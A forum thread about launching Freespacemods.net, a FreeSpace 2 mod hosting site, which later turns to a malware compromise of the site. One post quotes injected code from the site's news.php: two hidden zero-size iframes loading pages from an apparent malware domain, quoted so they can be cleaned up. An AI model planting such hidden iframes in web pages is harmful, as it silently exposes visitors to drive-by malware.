Title: Freespacemods.net
Post by: achtung on February 25, 2008, 11:39:07 am
Some of you may have noticed me using this when I mirror various mods now.  This is the site I decided to launch earlier this month as a place to upload and share the various files you have.

I purchased the domain a while back with intention to do this, but I ended up just using it as a sub-domain for the official FSPort/SA/T-V War Project/TBP mirrors I host.

I feel like publicizing this is a good idea now, as I *seem* to have most of the show-stopping kinks worked out.

------

Uploading - The maximum file size is 1 GB.  If your file is larger, or near this size and fails to upload, you can contact me at achtung-at-nukelol.com and we can work something out.  You don't even have to register to upload, you can simply go to the uploads page, fill out the info, and upload your file.  All files have to be approved by an Administrator before appearing, but this is usually a very quick process and may be eliminated very soon.  *UPDATE* Members can now upload files without Administrator approval!  Guest uploads still need approval, and always will.
ONLY UPLOAD MODS THAT HAVE CEASED DEVELOPMENT OR MODS THAT ARE COMPLETE.

Project Hosting - As I have been for a while, I'm more than willing to give someone hosting for their project.  You will get a sub-domain of freespacemods.net, fsmods.net, nukelol.com, fathax.com, or failnet.org.  I can also use DynDNS sub-domains.  Disk Space and bandwidth are negotiable and depend on your needs.  You get full FTP access, a MySQL database if needed, an e-mail address if needed, and SSH access if I feel you can be trusted with it.

Comments/Questions/Problems are welcome!

Yay
This should go in the "External Sites" tab.

The more stuff that's uploaded, the more chance it has of being put there.  I already talked to Goob about it, but he seemed to want to wait until I went public with it.

Well, I still have my advanced sentry guns lying around somewhere if you are interested (unfortunately they didn't evoked that much interest ater release, but maybe because I posted that shortly after a huge HLP downtime where probably most people were still away :) ) However, I should find someone to do me shine and specmaps first since those are still missing  :nervous:

That would be awwwwwwwsome too.

Title: Re: Freespacemods.net
Post by: Droid803 on April 23, 2008, 06:43:12 pm
Its a ghost ship.
open with PCS2, hit Purge BSP Cache, and save again. That may fix it.

I've gotten used to doing that before I save every time, so no ghost ships pop up.

Hmm ... thought that I fixed collision detection when I uploaded it.  Did you do anything to it after you downloaded it?

Anyway, just do what Droid said, purge BSP Cache and resave.  Works every time.

I changed the position of two turrets and used the Texture Replacement feature in Fred_open. But purging the BSP Chache helped - thanks.
Title: Re: Freespacemods.net
Post by: blowfish on April 24, 2008, 05:55:20 pm
In my experience, doing anything without purging the cache can cause ghost ships.  So that probably means that the one I uploaded wasn't broken.   That's a relief :)
Title: Re: Freespacemods.net
Post by: Droid803 on April 24, 2008, 06:13:42 pm
I think you can reskin without that happening, occasionally. Its safer to purge every time though.

Blowfish,

Are your models pictured in your link in a pack anywhere???

Title: Re: Freespacemods.net
Post by: blowfish on May 17, 2008, 12:32:06 pm
Most of them aren't even textured.  The GTD Thanatos I gave up on halfway through conversion (I could revive it if you want), and the Leto (that round cruiser) is now ED-exclusive.  Other than that, none are complete enough to even think about releasing.  I plan to finish that refinery platform at some point for my own purposes.  If you wanted anything in particular finished, I could do that.

Note to all people uploading at FreeSpaceMods:

When giving screenshot images for your ship uploads, please give them descriptive names, like "apollo_screenshot", it makes it easier so that there aren't 10 pictures called "screenshot" or a random file called "tv682v" in the file manager. Also make sure there are no spaces in the file name (obviously) use underscores (_). Thank y'all.

Uhh, am I the only one who is not liking all the n00b mods now being added? Like the crappy reskins and the table hacks? If nobody objects, I am going to remove them all.

(And the Hestia isn't a n00b mod. The complete opposite, in fact. Keep churning out ships please)
Title: Re: Freespacemods.net
Post by: Titan on July 18, 2008, 04:05:05 pm
the maverick is pretty cool too- another first model, still beta, so it doesn't have real textures yet, just some capship textures fom BP. but it's still pretty awesome.

But the reskins and hacks are pretty annoying. nobody is going to want a table hack; they'll just make their own for what they need.

@Peterv snail's right, that Hestia is pretty good.

Yeah, noone wants a table hack, especially not one that only switches a few weapons and can be done in FRED!

Btw, where's this "Hestia"?
Title: Re: Freespacemods.net

In freespacemods.net, under the "transport and utility" category.
Title: Re: Freespacemods.net

Table hacks are the first step for new modders. I remember when that's all that existed. Leave em be i say. Just stick em in their own section. New guys need validation too :)
Title: Re: Freespacemods.net

Title: Re: Freespacemods.net
Post by: ShadowGorrath on July 22, 2008, 12:54:15 pm
Ugh... Couldn't you just put in a section for those table hacks, and move them all there?
Title: Re: Freespacemods.net
Post by: Snail on July 22, 2008, 12:58:38 pm
I could have, but it would be quicker to extract the ship.tbl from the .vp and make it yourself.
Title: Re: Freespacemods.net
Post by: ShadowGorrath on July 22, 2008, 01:02:48 pm
At least make a section for the crappy reskins and put them there. It could be someone's begining of the journey through the path of FS2 modding.

Er, whatever. Just instead of deleting them put them in a special section for all the people who begin to mod.
Title: Re: Freespacemods.net

Uh...if you mean by "begining of the journey through the path of FS2 modding" adding "player ship" to the flags and doing nothing else...uhh, well, that's not a really good start. Sure, I mean you could do it, but there's no need to share it because everyone and their grandma can do that.

    * Return to the previous page.
    * If you are the owner of this website, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Centre.

My conclusion:

CALL GOOGLE AND TELL THEM TO GET THIS OUT OF THEIR ADS.

EDIT: The issue has been reported, but it remains to be seen how fast Google reacts if at all.

EDIT2: In further inspection, it seems it isn't in fact the google ads; the script ends before the offending iframe entry on the news.php starts. Now I feel like a tool.

So Google is reporting an attack caused by Google adverts?

Yes. That was my response too, after going  and before :wtf:.

It makes no sense that they don't cross-reference the databases of reported malware sites with the sitest that are advertised by AdSense. Or if they do they should do it more often.

EDIT: I still feel like a tool. :ick:

Funny how my site contains stuff on Freespace and I use Google ads, yet I don't get strange blocks like that.

Not all google ads use the same ad lists, FreeSpaceMods just happened to get a malware site.

Who knows how many similar sites are marketing themselves through google ads. Although it could, hypothetically, be a case of trojan actually having infected the Google Ads of FreeSpaceMods to show a malware site, rather than Google AdSense actually having the malware site on their lists...

Any idea when google's going to fix the problem?

Hey folks, thought it might be a good idea to chime in and let everyone know what's going on.

My host recently decided to move my sites to another server on a whim.  The old servers were 32-bit, the new ones are 64-bit, and are running a different version of PHP.  This move broke all of my sites that used a modified php.ini horribly, and I had to go fix them all.  Somewhere in this mess, somebody managed to upload two .html files that redirected to reycross, which I assume is a malware distribution site.  One was uploaded as an avatar, and another as an upload into the public uploads section.

I have removed the offending files and requested a review of the site from Google.  Hopefully this will fix the issue Firefox and Chrome users are having.  I also plan to look into how exactly the files got there, and from where.

In a day or two it should be fine again.

Sorry.  =/

So that means I don't have to write about the virus that keeps me from entering the site (antivirus blocks the connection).

Not the best way to resume work on TotT after the summer break...

Oh well, google is innocent after all... However, immediately after the google ad javascript, there's the following entry in news.php:

Code: [Select]
<iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></td></tr></table><table style='width:100%' cellspacing='3'><tr><td style='width:20%;'></td><td style='width:60%;'><img src='/e107_themes/e107v4a/images/blank.gif' width='1' height='1' alt='' /></td><td style='width:20%;'></td></tr><tr><td style='width:20%; vertical-align: top;'>

Which I believe is what is initiating the virus intrusion attempts. It's still in the page source, so as things are Google will keep detecting the site as a malware site; removing all references to reycross.com recursively from all pages on the site should do the trick.

Funny ... there was a similar malware insertion (hidden frame) in the Earth Defense website, which somehow kept reappearing, a while ago.  It went away after I changed the infrastructure of the page but how it got there in the first place, and why it kept reappearing, both remain a mystery.

It's starting to look like it may be more work than it's worth to clean up fully.

Does anyone here hate Joomla?

You have a backup or something to revert to?

All downloads and screenshots are backed up on my machine and my host's server.  All I need to do, if I choose to keep e107, is backup the MySQL database, reinstall e107, and then put everything in place like it never happened.  That's how simple it *SHOULD* be.  I'm a strong believer in Murphy's Law though.

Joomla has terrible security history. Granted, most problems are caused by 3rd party addons/plugins rather than the core package. But still.

Good. It would take me weeks to recall and rewrite the storyline for TotT.

However as soon as the forum's up I'll save the storyline thread on my HDD to have a backup.

Main site and files restored.  Forums restored.  User registration disabled.  File upload disabled.  Screenshots for downloads are backed up, but not restored.

This is temporary.  There will be a replacement coming soon.

What's up with the uploading business? I cannot see an "upload" button anywhere (except the upload large file one which returns a 404 message), but I see that the 158th have uploaded Exposition.

If you need something uploaded just shoot me a link and I'll gladly add it.  I'm just trying to avoid too many things being added, as I'm not finding any good solutions for transferring the old database of downloads to a new CMS.  I may have to do it all by hand.   :ick:

I've redone the models sections of the downloads page but suggestions for the other parts sure would be nice.

Idea, Swantz. Subcategories are handled like sub-forums here. So say you click campaigns and it brings you to a page with the campaign categories.
